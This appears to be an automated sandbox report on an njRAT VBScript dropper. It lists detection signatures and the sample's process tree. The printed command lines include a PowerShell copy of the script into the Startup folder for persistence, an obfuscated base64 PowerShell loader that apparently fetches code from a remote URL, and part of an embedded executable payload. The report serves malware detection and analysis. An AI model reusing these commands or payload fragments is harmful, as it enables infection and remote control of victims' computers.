Edit tour
Windows
Analysis Report
NJratccccassssG2.00.vbs
Overview
General Information
Detection
Njrat
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected Njrat
Antivirus detection for URL or domain
Sigma detected: Encoded FromBase64String
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Sigma detected: FromBase64String Command Line
Sigma detected: Suspicious Encoded PowerShell Command Line
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Very long command line found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Uses ping.exe to sleep
Sigma detected: Suspicious PowerShell Cmdline
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
- wscript.exe (PID: 6576 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\NJrat ccccassssG 2.00.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - cmd.exe (PID: 4560 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\u ser\Deskto p\NJratccc cassssG2.0 0.vbs','C: \Users\' + [Environm ent]::User Name + '\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \ VFM.vbs' ) MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 3732 cmdline:
ping 127.0 .0.1 -n 10 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - powershell.exe (PID: 6844 cmdline:
powershell -command [System.IO .File]::Co py('C:\Use rs\user\De sktop\NJra tccccassss G2.00.vbs' ,'C:\Users \' + [Envi ronment]:: UserName + '\AppData \Roaming\M icrosoft\W indows\Sta rt Menu\Pr ograms\Sta rtup\ VFM. vbs') MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 5608 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' J?BM?Eg?Zw BL?C??PQ?g ?Cc?JQBN?E k?UwBx?Eg? RwBL?Fo?TQ BB?CU?Jw?7 ?Fs?QgB5?H Q?ZQBb?F0? XQ?g?CQ?Zg B1?FU?Tg?g ?D0?I?Bb?F M?eQBz?HQ? ZQBt?C4?Qw Bv?G4?dgBl ?HI?d?Bd?D o?OgBG?HI? bwBt?EI?YQ Bz?GU?Ng?0 ?FM?d?By?G k?bgBn?Cg? I??k?Ew?S? Bn?Es?LgBy ?GU?c?Bs?G E?YwBl?Cg? JwDmEEIgrC ?n?Cw?JwBB ?Cc?KQ?g?C k?OwBb?FM? eQBz?HQ?ZQ Bt?C4?QQBw ?H??R?Bv?G 0?YQBp?G4? XQ?6?Do?Qw B1?HI?cgBl ?G4?d?BE?G 8?bQBh?Gk? bg?u?Ew?bw Bh?GQ?K??k ?GY?dQBV?E 4?KQ?u?Ec? ZQB0?FQ?eQ Bw?GU?K??n ?Gw?c?BP?F U?c?Bs?E0? c??u?FU?Rw Bs?Hk?bQB6 ?FU?Zw?n?C k?LgBH?GU? d?BN?GU?d? Bo?G8?Z??o ?Cc?VQBE?H M?UwBp?EQ? YgBi?Cc?KQ ?u?Ek?bgB2 ?G8?awBl?C g?J?Bu?HU? b?Bs?Cw?I? Bb?G8?YgBq ?GU?YwB0?F s?XQBd?C?? K??n?HQ?e? B0?C4?YQBz ?GE?YwBX?E U?TgB0?GE? cgBK?E4?M? ?y?CU?N??2 ?D??Mg?l?G U?cwBh?GI? LwBh?HM?YQ Bj?D??Mg?l ?Fc?RQBO?H Q?YQBy?Eo? Tg?v?G0?bw Bj?C4?bwB1 ?GU?dQ?u?H c?ZQBu?GE? cwBh?GM?d? Bh?HI?agBu ?C8?Lw?6?H ??d?B0?Gg? Jw?p?Ck?'; $OWjuxD = [System.Te xt.Encodin g]::Unicod e.GetStrin g( [System .Convert]: :FromBase6 4String( $ Codigo.rep lace('?',' A') ) ).re place('%MI SqHGKZMA%' ,'TVqQ?? ? ? M?? ?? ? ? ?? E?? ? ? ?? ?? // 8?? ?? Lg? ? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? g? ? ?? ?? ?? ?? 4fug4? ? t?? nNIb gBTM0hVGhp cyBwcm9ncm FtIGNhbm5v dCBiZSBydW 4gaW4gRE9T IG1vZGUuDQ 0KJ?? ?? ? ? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? O JNIpY?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? O?? ? ? ?? iEL?? V?? ?? ?? Bw?? ?? ? ? ?? G?? ? ? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ? ? E?? ?? g ?? ?? ?? ? ? ?? g?? ? ? B?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ? ? ?? ?? M? ? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ? ? ?? B?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? G?? ? ? ?? ?? w? ? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? I? ? ?? ?? C? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? CC?? ? ? ?? Eg?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? C 50ZXh0?? ? ? ?? ?? CB o?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ? ? I?? ?? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD ?? ?? ?? ? ? Q?? ?? ? ? ?? ?? Q? ? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ? ? ?? ?? ??